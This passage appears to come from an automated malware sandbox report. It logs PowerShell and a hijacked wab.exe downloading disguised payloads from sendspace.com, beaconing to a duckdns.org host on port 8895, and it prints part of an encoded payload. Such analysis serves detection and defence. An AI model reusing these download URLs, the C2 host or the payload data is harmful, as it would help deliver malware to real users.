                                                                        May 23, 2024 18:25:56.158863068 CEST4434971169.31.136.57192.168.2.9
                                                                        May 23, 2024 18:25:56.158942938 CEST49711443192.168.2.969.31.136.57
                                                                        May 23, 2024 18:25:56.158947945 CEST4434971169.31.136.57192.168.2.9
                                                                        May 23, 2024 18:25:56.158977985 CEST4434971169.31.136.57192.168.2.9
                                                                        May 23, 2024 18:25:56.158982992 CEST49711443192.168.2.969.31.136.57
                                                                        May 23, 2024 18:25:56.159027100 CEST49711443192.168.2.969.31.136.57
                                                                        May 23, 2024 18:25:56.159027100 CEST49711443192.168.2.969.31.136.57
                                                                        May 23, 2024 18:25:56.159033060 CEST4434971169.31.136.57192.168.2.9
                                                                        May 23, 2024 18:25:56.159055948 CEST49711443192.168.2.969.31.136.57
                                                                        May 23, 2024 18:25:56.159183025 CEST49711443192.168.2.969.31.136.57
                                                                        May 23, 2024 18:25:59.648607969 CEST497138895192.168.2.957.128.155.22
                                                                        May 23, 2024 18:25:59.678790092 CEST88954971357.128.155.22192.168.2.9
                                                                        May 23, 2024 18:25:59.679408073 CEST497138895192.168.2.957.128.155.22
                                                                        May 23, 2024 18:25:59.956298113 CEST497138895192.168.2.957.128.155.22
                                                                        May 23, 2024 18:25:59.976969957 CEST88954971357.128.155.22192.168.2.9
                                                                        May 23, 2024 18:26:11.361514091 CEST497138895192.168.2.957.128.155.22
                                                                        May 23, 2024 18:26:11.372457027 CEST88954971357.128.155.22192.168.2.9
                                                                        May 23, 2024 18:26:12.708563089 CEST88954971357.128.155.22192.168.2.9
                                                                        May 23, 2024 18:26:12.812195063 CEST497138895192.168.2.957.128.155.22
                                                                        May 23, 2024 18:26:22.765738964 CEST497138895192.168.2.957.128.155.22
                                                                        May 23, 2024 18:26:22.778700113 CEST88954971357.128.155.22192.168.2.9
                                                                        May 23, 2024 18:26:34.172461987 CEST497138895192.168.2.957.128.155.22
                                                                        May 23, 2024 18:26:34.422003984 CEST497138895192.168.2.957.128.155.22
                                                                        May 23, 2024 18:26:34.444237947 CEST88954971357.128.155.22192.168.2.9
                                                                        May 23, 2024 18:26:34.444737911 CEST88954971357.128.155.22192.168.2.9
                                                                        May 23, 2024 18:26:42.855367899 CEST88954971357.128.155.22192.168.2.9
                                                                        May 23, 2024 18:26:42.906280994 CEST497138895192.168.2.957.128.155.22
                                                                        May 23, 2024 18:26:45.579266071 CEST497138895192.168.2.957.128.155.22
                                                                        May 23, 2024 18:26:45.627641916 CEST88954971357.128.155.22192.168.2.9
                                                                        May 23, 2024 18:26:56.985131025 CEST497138895192.168.2.957.128.155.22
                                                                        May 23, 2024 18:26:56.990108013 CEST88954971357.128.155.22192.168.2.9
                                                                        May 23, 2024 18:27:05.844082117 CEST497138895192.168.2.957.128.155.22
                                                                        May 23, 2024 18:27:05.907345057 CEST88954971357.128.155.22192.168.2.9
                                                                        May 23, 2024 18:27:12.688535929 CEST88954971357.128.155.22192.168.2.9
                                                                        May 23, 2024 18:27:12.734462976 CEST497138895192.168.2.957.128.155.22

                                                                        UDP Packets

                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                        May 23, 2024 18:25:10.054425001 CEST4996853192.168.2.91.1.1.1
                                                                        May 23, 2024 18:25:10.064584017 CEST53499681.1.1.1192.168.2.9
                                                                        May 23, 2024 18:25:10.857893944 CEST5697653192.168.2.91.1.1.1
                                                                        May 23, 2024 18:25:10.912872076 CEST53569761.1.1.1192.168.2.9
                                                                        May 23, 2024 18:25:54.865331888 CEST5642053192.168.2.91.1.1.1
                                                                        May 23, 2024 18:25:54.912864923 CEST53564201.1.1.1192.168.2.9
                                                                        May 23, 2024 18:25:59.491137981 CEST5446453192.168.2.91.1.1.1
                                                                        May 23, 2024 18:25:59.646441936 CEST53544641.1.1.1192.168.2.9

                                                                        DNS Queries

                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                        May 23, 2024 18:25:10.054425001 CEST192.168.2.91.1.1.10xf5e5Standard query (0)www.sendspace.comA (IP address)IN (0x0001)false
                                                                        May 23, 2024 18:25:10.857893944 CEST192.168.2.91.1.1.10x3651Standard query (0)fs03n1.sendspace.comA (IP address)IN (0x0001)false
                                                                        May 23, 2024 18:25:54.865331888 CEST192.168.2.91.1.1.10x35a7Standard query (0)fs13n5.sendspace.comA (IP address)IN (0x0001)false
                                                                        May 23, 2024 18:25:59.491137981 CEST192.168.2.91.1.1.10xa23eStandard query (0)rachesxwdavid.duckdns.orgA (IP address)IN (0x0001)false

                                                                        DNS Answers

                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                        May 23, 2024 18:25:10.064584017 CEST1.1.1.1192.168.2.90xf5e5No error (0)www.sendspace.com172.67.170.105A (IP address)IN (0x0001)false
                                                                        May 23, 2024 18:25:10.064584017 CEST1.1.1.1192.168.2.90xf5e5No error (0)www.sendspace.com104.21.28.80A (IP address)IN (0x0001)false
                                                                        May 23, 2024 18:25:10.912872076 CEST1.1.1.1192.168.2.90x3651No error (0)fs03n1.sendspace.com69.31.136.17A (IP address)IN (0x0001)false
                                                                        May 23, 2024 18:25:54.912864923 CEST1.1.1.1192.168.2.90x35a7No error (0)fs13n5.sendspace.com69.31.136.57A (IP address)IN (0x0001)false
                                                                        May 23, 2024 18:25:59.646441936 CEST1.1.1.1192.168.2.90xa23eNo error (0)rachesxwdavid.duckdns.org57.128.155.22A (IP address)IN (0x0001)false

                                                                        HTTP Request Dependency Graph

                                                                        • www.sendspace.com
                                                                        • fs03n1.sendspace.com
                                                                        • fs13n5.sendspace.com

                                                                        HTTPS Proxied Packets

                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        0192.168.2.949706172.67.170.1054437308C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-05-23 16:25:10 UTC174OUTGET /pro/dl/tbfvpd HTTP/1.1
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                        Host: www.sendspace.com
                                                                        Connection: Keep-Alive
                                                                        2024-05-23 16:25:10 UTC943INHTTP/1.1 301 Moved Permanently
                                                                        Date: Thu, 23 May 2024 16:25:10 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Set-Cookie: SID=39ouo840ocufoic3f1l8aped65; path=/; domain=.sendspace.com
                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                        Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                        Pragma: no-cache
                                                                        Location: https://fs03n1.sendspace.com/dlpro/85796124f5e308d921827e38e402c0c9/664f6de7/tbfvpd/Parnorpine.java
                                                                        Vary: Accept-Encoding
                                                                        CF-Cache-Status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1672e%2FGRihnxd3hzjl4XsPL1S40plxjibcZOyxK3BMhNSkWuS3Pa2Zq6sVXvcDJf4ihDGAyTWHZs7DxC%2BtINchioqar%2FXziH1fUwvkbKGIGoFrAevqnWpXtIEDFU2QXEq08N%2FA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 88866681dec24308-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        2024-05-23 16:25:10 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                        Data Ascii: 0


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        1192.168.2.94970769.31.136.174437308C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-05-23 16:25:11 UTC234OUTGET /dlpro/85796124f5e308d921827e38e402c0c9/664f6de7/tbfvpd/Parnorpine.java HTTP/1.1
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                        Host: fs03n1.sendspace.com
                                                                        Connection: Keep-Alive
                                                                        2024-05-23 16:25:11 UTC500INHTTP/1.1 200 OK
                                                                        Server: nginx
                                                                        Date: Thu, 23 May 2024 16:25:11 GMT
                                                                        Content-Type: application/octet-stream
                                                                        Content-Length: 448940
                                                                        Last-Modified: Wed, 15 May 2024 07:52:33 GMT
                                                                        Connection: close
                                                                        Set-Cookie: SID=ivciuletila01p6s4eq8kblbe6; path=/; domain=.sendspace.com
                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                        Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                        Content-Disposition: attachment;filename="Parnorpine.java"
                                                                        ETag: "664469c1-6d9ac"
                                                                        Accept-Ranges: bytes
                                                                        2024-05-23 16:25:11 UTC15884INData Raw: 63 51 47 62 36 77 4c 7a 73 72 75 4d 53 78 49 41 36 77 4c 4c 62 4f 73 43 2f 6f 77 44 58 43 51 45 36 77 4c 36 30 33 45 42 6d 37 6c 63 2b 51 48 76 63 51 47 62 63 51 47 62 67 66 45 37 50 50 4e 54 63 51 47 62 63 51 47 62 67 65 6c 6e 78 66 4b 38 36 77 4b 78 4a 48 45 42 6d 33 45 42 6d 2b 73 43 31 7a 4b 36 46 32 58 72 4a 65 73 43 48 76 70 78 41 5a 74 78 41 5a 76 72 41 71 69 76 4d 63 72 72 41 73 6e 56 36 77 4c 62 59 34 6b 55 43 33 45 42 6d 2b 73 43 5a 32 58 52 34 6e 45 42 6d 2b 73 43 74 68 36 44 77 51 54 72 41 67 37 79 36 77 49 58 37 6f 48 35 4e 41 63 69 41 6e 7a 4a 36 77 4c 42 68 58 45 42 6d 34 74 45 4a 41 52 78 41 5a 76 72 41 6c 73 54 69 63 50 72 41 76 68 7a 36 77 4c 6f 44 6f 48 44 50 64 53 66 41 48 45 42 6d 33 45 42 6d 37 71 4b 65 41 49 73 36 77 4a 31 54 58 45
                                                                        Data Ascii: cQGb6wLzsruMSxIA6wLLbOsC/owDXCQE6wL603EBm7lc+QHvcQGbcQGbgfE7PPNTcQGbcQGbgelnxfK86wKxJHEBm3EBm+sC1zK6F2XrJesCHvpxAZtxAZvrAqivMcrrAsnV6wLbY4kUC3EBm+sCZ2XR4nEBm+sCth6DwQTrAg7y6wIX7oH5NAciAnzJ6wLBhXEBm4tEJARxAZvrAlsTicPrAvhz6wLoDoHDPdSfAHEBm3EBm7qKeAIs6wJ1TXE
                                                                        2024-05-23 16:25:11 UTC16384INData Raw: 54 52 4b 6d 7a 50 64 42 75 4e 68 44 30 7a 68 2f 54 51 70 57 52 48 4a 7a 75 4e 6a 55 2b 34 70 63 52 65 6f 4b 45 4e 59 48 52 54 68 69 4d 78 56 30 59 74 38 5a 6e 39 45 35 52 72 67 58 56 48 6b 35 4d 51 36 41 4e 73 49 44 70 4f 48 6c 73 63 65 6f 57 32 52 31 59 64 45 77 44 58 64 6d 34 4f 76 56 4b 71 4c 31 49 38 6d 4b 56 76 62 6a 4f 30 65 2f 55 4e 31 47 61 37 32 39 45 41 5a 6b 30 4d 34 5a 66 59 56 61 4b 35 58 54 41 67 57 63 38 7a 6e 75 6a 66 77 35 4e 73 7a 38 4f 54 62 4d 2f 44 6b 32 7a 50 77 35 4e 73 7a 38 4f 54 62 4d 2f 44 6b 32 33 55 43 5a 53 6b 68 33 76 48 7a 4f 2f 44 6c 6d 64 48 45 56 44 63 4c 52 4e 32 32 31 38 67 78 77 56 6f 71 7a 4d 34 49 46 75 2f 4c 35 65 33 77 4d 39 71 75 6c 76 79 76 39 50 71 76 31 4d 30 59 77 69 31 64 41 41 59 41 36 39 75 55 5a 78 37 53
                                                                        Data Ascii: TRKmzPdBuNhD0zh/TQpWRHJzuNjU+4pcReoKENYHRThiMxV0Yt8Zn9E5RrgXVHk5MQ6ANsIDpOHlsceoW2R1YdEwDXdm4OvVKqL1I8mKVvbjO0e/UN1Ga729EAZk0M4ZfYVaK5XTAgWc8znujfw5Nsz8OTbM/Dk2zPw5Nsz8OTbM/Dk23UCZSkh3vHzO/DlmdHEVDcLRN2218gxwVoqzM4IFu/L5e3wM9qulvyv9Pqv1M0Ywi1dAAYA69uUZx7S
                                                                        2024-05-23 16:25:12 UTC16384INData Raw: 52 33 45 71 4e 4d 7a 38 61 59 35 57 70 35 73 49 34 55 6f 43 65 75 6e 52 33 53 69 61 35 57 71 71 52 52 38 77 4e 56 46 35 34 6b 37 49 77 34 68 39 5a 4e 63 72 4c 58 5a 67 79 42 67 5a 79 6b 73 4a 58 69 78 79 78 58 4d 61 4e 47 58 73 4c 78 63 4f 72 64 31 71 6a 65 37 38 4f 54 5a 4e 42 30 7a 68 51 50 63 32 75 2b 4f 36 50 54 61 58 70 37 6e 4e 63 71 53 34 38 54 50 38 4f 54 5a 46 65 64 77 33 7a 50 79 77 7a 70 31 46 74 68 69 79 68 72 6a 66 4d 65 76 69 65 45 30 4e 30 4c 78 36 64 37 6a 48 72 64 73 73 6c 6b 58 31 61 75 62 49 70 70 7a 68 49 54 69 65 44 31 70 56 65 65 49 63 49 6a 77 35 4d 49 51 79 36 64 74 41 4e 79 72 75 72 79 36 48 78 6e 75 52 43 58 2f 5a 76 31 53 49 62 47 49 6e 5a 61 56 70 76 55 6b 5a 4f 44 62 4d 71 6f 63 6b 6e 4a 55 47 74 79 49 4b 51 61 4c 33 66 64 63
                                                                        Data Ascii: R3EqNMz8aY5Wp5sI4UoCeunR3Sia5WqqRR8wNVF54k7Iw4h9ZNcrLXZgyBgZyksJXixyxXMaNGXsLxcOrd1qje78OTZNB0zhQPc2u+O6PTaXp7nNcqS48TP8OTZFedw3zPywzp1FthiyhrjfMevieE0N0Lx6d7jHrdsslkX1aubIppzhITieD1pVeeIcIjw5MIQy6dtANyrury6HxnuRCX/Zv1SIbGInZaVpvUkZODbMqocknJUGtyIKQaL3fdc
                                                                        2024-05-23 16:25:12 UTC16384INData Raw: 72 57 4f 43 74 6a 50 4d 61 59 37 2b 45 34 64 46 79 52 73 31 71 44 66 52 49 4d 32 51 6b 32 75 71 52 52 34 77 4e 46 48 45 36 55 58 48 5a 44 59 72 6e 31 37 56 49 66 73 47 4f 4f 6b 58 4c 56 50 58 38 44 39 61 36 55 36 4e 76 75 50 6e 6b 69 6a 54 79 4d 4a 6b 44 77 53 6d 58 37 4d 50 70 4c 61 7a 75 50 30 35 4e 6a 2f 7a 2f 67 62 4d 2f 44 6b 32 7a 50 77 35 4e 73 7a 38 4f 54 62 4d 2f 44 6b 32 7a 50 77 35 4e 73 7a 38 4f 54 53 52 38 77 4d 63 42 6d 53 5a 78 2b 6f 59 35 66 6f 7a 67 5a 4a 41 69 2b 30 35 30 36 64 6d 65 39 35 75 45 44 6b 32 6e 45 52 35 6e 55 6c 51 44 4d 6a 46 73 68 45 44 69 78 77 66 6a 66 6e 56 44 33 6b 50 30 65 6c 46 62 67 42 71 71 6b 55 66 4f 44 56 52 65 4f 74 49 30 4b 48 74 34 6f 53 36 42 31 75 5a 6b 54 42 53 59 32 4e 38 73 6a 4e 61 4d 43 4e 64 2f 52 53
                                                                        Data Ascii: rWOCtjPMaY7+E4dFyRs1qDfRIM2Qk2uqRR4wNFHE6UXHZDYrn17VIfsGOOkXLVPX8D9a6U6NvuPnkijTyMJkDwSmX7MPpLazuP05Nj/z/gbM/Dk2zPw5Nsz8OTbM/Dk2zPw5Nsz8OTSR8wMcBmSZx+oY5fozgZJAi+0506dme95uEDk2nER5nUlQDMjFshEDixwfjfnVD3kP0elFbgBqqkUfODVReOtI0KHt4oS6B1uZkTBSY2N8sjNaMCNd/RS
                                                                        2024-05-23 16:25:12 UTC16384INData Raw: 48 65 33 66 34 49 4d 34 54 56 4d 31 76 66 73 68 47 4e 49 30 36 6c 48 4f 66 76 48 47 47 51 44 33 6c 5a 6f 41 39 5a 4f 74 67 50 47 32 6c 45 4b 33 4a 61 31 73 59 61 42 39 79 47 63 79 41 71 75 33 50 64 76 6a 32 56 47 71 70 62 38 71 2f 54 65 72 39 53 56 43 4f 36 5a 30 6e 37 41 76 67 4b 35 64 6f 51 77 45 30 59 33 57 41 48 6e 33 41 66 6c 49 77 41 57 48 71 57 76 6b 76 74 74 52 73 4f 7a 68 36 76 65 45 79 32 33 6d 38 37 65 78 69 43 4b 2f 7a 50 78 47 50 70 49 4c 2b 6d 36 39 46 41 52 76 77 2f 33 4f 41 73 7a 38 4f 54 62 4d 2f 44 6b 32 7a 50 77 35 4e 73 7a 38 4f 54 62 4d 2f 44 6b 32 7a 50 77 35 4e 73 34 71 34 7a 64 4e 49 4c 78 6b 6e 44 42 57 53 63 32 37 64 57 4f 50 70 5a 45 55 50 6e 57 38 34 38 33 38 4f 57 52 32 77 32 57 4f 79 6e 33 37 46 56 47 2f 31 4c 63 6d 6b 4f 2f
                                                                        Data Ascii: He3f4IM4TVM1vfshGNI06lHOfvHGGQD3lZoA9ZOtgPG2lEK3Ja1sYaB9yGcyAqu3Pdvj2VGqpb8q/Ter9SVCO6Z0n7AvgK5doQwE0Y3WAHn3AflIwAWHqWvkvttRsOzh6veEy23m87exiCK/zPxGPpIL+m69FARvw/3OAsz8OTbM/Dk2zPw5Nsz8OTbM/Dk2zPw5Ns4q4zdNILxknDBWSc27dWOPpZEUPnW84838OWR2w2WOyn37FVG/1LcmkO/
                                                                        2024-05-23 16:25:12 UTC16384INData Raw: 7a 76 77 35 51 7a 75 39 2f 6a 64 53 52 30 4c 51 54 63 33 32 65 39 57 37 41 66 31 4e 7a 63 51 41 42 30 32 34 48 31 6a 61 32 53 78 4a 4e 56 2b 33 4d 36 65 73 38 55 6b 47 4f 44 62 4d 58 7a 51 64 72 6e 32 38 7a 4d 33 38 4f 5a 31 70 68 63 4f 33 65 51 59 34 4e 73 79 65 6b 72 4f 35 6d 72 6a 4d 59 32 43 34 6d 7a 62 39 4f 54 62 6c 35 42 67 66 71 6e 6e 6f 64 7a 4e 78 77 7a 66 4d 2f 45 7a 42 6a 54 73 34 50 67 34 55 51 62 4d 4f 66 54 69 57 48 33 4b 4b 6e 32 56 53 4e 6e 70 4e 7a 62 6d 70 65 70 78 66 77 51 71 5a 34 72 66 39 2b 74 45 75 70 6e 6a 55 73 78 59 37 76 4d 44 4e 2f 44 6d 39 36 4b 48 71 44 78 39 39 6a 4d 44 4e 2f 44 6d 57 66 52 74 4c 74 30 6b 4b 4f 44 62 4d 46 53 66 4e 78 33 32 4d 77 4d 33 38 4f 53 46 34 53 5a 52 33 4d 33 48 50 4e 38 7a 38 54 4d 47 71 65 66 74
                                                                        Data Ascii: zvw5Qzu9/jdSR0LQTc32e9W7Af1NzcQAB024H1ja2SxJNV+3M6es8UkGODbMXzQdrn28zM38OZ1phcO3eQY4NsyekrO5mrjMY2C4mzb9OTbl5BgfqnnodzNxwzfM/EzBjTs4Pg4UQbMOfTiWH3KKn2VSNnpNzbmpepxfwQqZ4rf9+tEupnjUsxY7vMDN/Dm96KHqDx99jMDN/DmWfRtLt0kKODbMFSfNx32MwM38OSF4SZR3M3HPN8z8TMGqeft
                                                                        2024-05-23 16:25:12 UTC16384INData Raw: 42 77 4f 73 68 73 7a 38 4f 51 38 45 64 61 51 41 7a 76 77 35 44 69 4a 48 37 64 6e 50 75 37 6a 46 6a 34 43 56 46 50 51 6b 76 4f 56 4e 46 31 64 59 72 35 2b 34 78 65 58 5a 64 54 54 31 4a 4c 4b 72 2b 76 34 35 4e 73 4e 34 57 44 66 4d 2f 47 47 79 4f 48 57 73 6a 4d 33 38 4f 62 32 59 32 44 57 31 4e 76 32 79 6f 33 62 39 4f 54 61 34 31 37 68 4c 73 46 50 74 4e 73 7a 7a 74 4e 4e 48 41 38 61 2f 55 57 6f 34 4e 73 78 31 2b 67 34 55 72 38 2f 30 52 58 65 6b 6f 4d 33 38 4f 63 6d 35 71 4e 45 79 53 76 38 35 73 6a 70 35 36 37 39 5a 66 54 67 32 7a 48 33 47 6c 58 64 2f 55 72 32 59 32 43 6d 33 4e 73 55 38 4e 73 78 33 72 4c 66 4e 2f 44 6b 35 53 43 6f 35 4e 73 78 38 77 2f 42 48 69 42 30 79 52 58 6c 39 4e 4d 7a 38 67 51 79 64 64 56 4d 44 71 33 4f 54 30 66 6e 43 34 4a 4a 39 79 56 73
                                                                        Data Ascii: BwOshsz8OQ8EdaQAzvw5DiJH7dnPu7jFj4CVFPQkvOVNF1dYr5+4xeXZdTT1JLKr+v45NsN4WDfM/GGyOHWsjM38Ob2Y2DW1Nv2yo3b9OTa417hLsFPtNszztNNHA8a/UWo4Nsx1+g4Ur8/0RXekoM38Ocm5qNEySv85sjp5679ZfTg2zH3GlXd/Ur2Y2Cm3NsU8Nsx3rLfN/Dk5SCo5Nsx8w/BHiB0yRXl9NMz8gQyddVMDq3OT0fnC4JJ9yVs
                                                                        2024-05-23 16:25:12 UTC16384INData Raw: 4f 2f 30 35 4e 6b 64 37 4f 54 37 4d 2f 4c 43 7a 4e 50 77 35 4e 70 70 43 74 50 57 2b 7a 4c 6a 77 62 37 61 63 77 6b 30 4b 43 54 6e 55 32 57 75 71 52 52 34 34 42 46 48 45 36 6b 72 76 31 35 4a 37 6a 42 52 49 42 70 64 6c 33 39 73 51 77 78 44 6e 74 6b 36 62 2f 38 4e 75 47 67 64 66 68 79 62 31 4d 54 2b 4e 66 66 44 43 63 68 5a 6c 38 4f 57 56 6e 39 45 51 4f 79 35 39 77 31 6c 61 43 46 35 73 71 67 76 34 2f 66 4f 69 73 6e 44 41 2f 62 7a 4f 7a 50 77 35 76 79 54 35 77 54 62 4d 2f 4c 43 4c 37 50 34 35 4e 6b 55 37 61 49 39 70 77 6b 38 48 54 54 31 58 57 4a 62 2f 75 50 66 4b 78 77 6e 39 52 65 58 6a 48 2b 65 59 33 34 65 67 4b 45 46 58 6e 57 5a 68 6f 6b 4b 30 4b 4a 4f 71 72 6a 4a 6d 54 6b 67 64 4d 6e 52 61 78 73 5a 73 2b 56 65 39 46 7a 74 48 77 39 75 6d 48 42 6e 58 52 69 6a
                                                                        Data Ascii: O/05Nkd7OT7M/LCzNPw5NppCtPW+zLjwb7acwk0KCTnU2WuqRR44BFHE6krv15J7jBRIBpdl39sQwxDntk6b/8NuGgdfhyb1MT+NffDCchZl8OWVn9EQOy59w1laCF5sqgv4/fOisnDA/bzOzPw5vyT5wTbM/LCL7P45NkU7aI9pwk8HTT1XWJb/uPfKxwn9ReXjH+eY34egKEFXnWZhokK0KJOqrjJmTkgdMnRaxsZs+Ve9FztHw9umHBnXRij
                                                                        2024-05-23 16:25:12 UTC16384INData Raw: 53 42 6d 34 33 43 74 35 36 7a 4e 4e 50 74 71 7a 48 76 6d 79 43 74 30 37 76 4b 76 4e 2f 44 6c 35 78 37 78 63 74 32 46 68 4f 44 62 4d 54 35 58 37 35 71 71 48 43 4a 2f 79 53 37 55 79 33 7a 61 34 68 39 6f 36 4e 70 4a 39 6a 4b 76 4e 2f 44 6d 48 48 6c 75 46 74 30 6c 68 4f 44 62 4d 4b 6b 6f 63 74 62 37 47 75 31 48 39 4f 54 61 35 43 33 75 33 4e 32 34 30 7a 4f 72 48 52 52 4c 49 38 37 78 39 4d 77 50 47 44 68 56 31 70 49 4c 4e 2f 44 6d 2f 44 36 2b 79 71 33 6a 39 4f 54 61 71 65 66 6d 2f 55 51 77 34 4e 73 78 31 38 6d 55 37 4f 33 6c 51 72 2f 47 79 71 7a 7a 39 4f 54 5a 46 63 56 4d 30 7a 50 79 77 35 35 32 61 41 4f 64 48 63 56 4d 30 7a 50 79 77 35 73 30 30 73 4c 73 58 2f 54 6b 32 53 44 36 77 39 35 31 33 74 4f 33 4e 2f 44 6d 32 4e 76 58 52 48 4f 4c 2f 4f 62 64 78 55 44 6b
                                                                        Data Ascii: SBm43Ct56zNNPtqzHvmyCt07vKvN/Dl5x7xct2FhODbMT5X75qqHCJ/yS7Uy3za4h9o6NpJ9jKvN/DmHHluFt0lhODbMKkoctb7Gu1H9OTa5C3u3N240zOrHRRLI87x9MwPGDhV1pILN/Dm/D6+yq3j9OTaqefm/UQw4Nsx18mU7O3lQr/Gyqzz9OTZFcVM0zPyw552aAOdHcVM0zPyw5s00sLsX/Tk2SD6w9513tO3N/Dm2NvXRHOL/ObdxUDk
                                                                        2024-05-23 16:25:12 UTC16384INData Raw: 4c 6e 42 70 70 6b 53 55 47 64 30 78 61 69 7a 34 55 31 77 32 4c 69 4f 7a 39 6d 68 4e 46 55 68 69 6f 32 79 34 33 2f 51 52 49 4d 50 44 2f 43 6a 4b 7a 50 77 35 4e 73 7a 38 4f 54 62 4d 2f 44 6b 32 7a 50 77 35 4e 73 7a 38 4f 54 62 4d 2f 44 6b 6e 58 49 62 4e 37 2f 56 78 50 54 66 4d 2f 4c 4b 37 48 2f 30 35 4e 73 4e 34 36 42 2f 4d 2f 46 48 76 67 76 37 78 74 2b 44 59 33 2b 7a 4b 47 54 62 78 39 66 49 35 4e 73 7a 38 4f 54 62 4d 2f 44 6b 32 7a 50 77 35 4e 73 7a 38 4f 54 62 4d 2f 44 6b 32 7a 4f 6f 63 54 70 55 43 61 67 35 7a 72 42 5a 78 5a 58 30 4e 45 71 67 56 63 36 52 4e 2b 42 31 62 71 62 4b 32 76 30 6c 43 4f 44 62 4d 4d 4a 36 6f 6f 4d 4a 6b 35 2f 46 38 54 76 32 61 48 38 6f 33 39 34 77 73 58 63 4e 6d 47 62 44 33 59 58 52 41 7a 58 6f 4b 77 5a 44 55 61 46 68 76 6c 78 2b
                                                                        Data Ascii: LnBppkSUGd0xaiz4U1w2LiOz9mhNFUhio2y43/QRIMPD/CjKzPw5Nsz8OTbM/Dk2zPw5Nsz8OTbM/DknXIbN7/VxPTfM/LK7H/05NsN46B/M/FHvgv7xt+DY3+zKGTbx9fI5Nsz8OTbM/Dk2zPw5Nsz8OTbM/Dk2zOocTpUCag5zrBZxZX0NEqgVc6RN+B1bqbK2v0lCODbMMJ6ooMJk5/F8Tv2aH8o394wsXcNmGbD3YXRAzXoKwZDUaFhvlx+


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        2192.168.2.949710172.67.170.1054438060C:\Program Files (x86)\Windows Mail\wab.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-05-23 16:25:54 UTC175OUTGET /pro/dl/dy1f16 HTTP/1.1
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                        Host: www.sendspace.com
                                                                        Cache-Control: no-cache
                                                                        2024-05-23 16:25:54 UTC944INHTTP/1.1 301 Moved Permanently
                                                                        Date: Thu, 23 May 2024 16:25:54 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Set-Cookie: SID=asnkose8meuts76a32vtsvb0k7; path=/; domain=.sendspace.com
                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                        Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                        Pragma: no-cache
                                                                        Location: https://fs13n5.sendspace.com/dlpro/44141c5e47f518aa141f08f91a6c6e36/664f6e12/dy1f16/yBKPKDHbe243.bin
                                                                        Vary: Accept-Encoding
                                                                        CF-Cache-Status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dv%2FzfcDg9TXLGkpQqUa7E%2BjYkEyVjIrtY%2BTnVPAVTqMkppjEnn7lDu6JF2eiwVVtyscA4%2FJt6pUBW1Vuh8UigywViec21mklMSM6rZlBwAFQkYoB1EAka6yjXM6SGwKvXa0zbA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 88866794b8cf42b2-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        2024-05-23 16:25:54 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                        Data Ascii: 0


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        3192.168.2.94971169.31.136.574438060C:\Program Files (x86)\Windows Mail\wab.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-05-23 16:25:55 UTC300OUTGET /dlpro/44141c5e47f518aa141f08f91a6c6e36/664f6e12/dy1f16/yBKPKDHbe243.bin HTTP/1.1
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                        Cache-Control: no-cache
                                                                        Host: fs13n5.sendspace.com
                                                                        Connection: Keep-Alive
                                                                        Cookie: SID=asnkose8meuts76a32vtsvb0k7
                                                                        2024-05-23 16:25:56 UTC424INHTTP/1.1 200 OK
                                                                        Server: nginx
                                                                        Date: Thu, 23 May 2024 16:25:55 GMT
                                                                        Content-Type: application/octet-stream
                                                                        Content-Length: 34368
                                                                        Last-Modified: Wed, 15 May 2024 07:50:57 GMT
                                                                        Connection: close
                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                        Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                        Content-Disposition: attachment;filename="yBKPKDHbe243.bin"
                                                                        ETag: "66446961-8640"
                                                                        Accept-Ranges: bytes
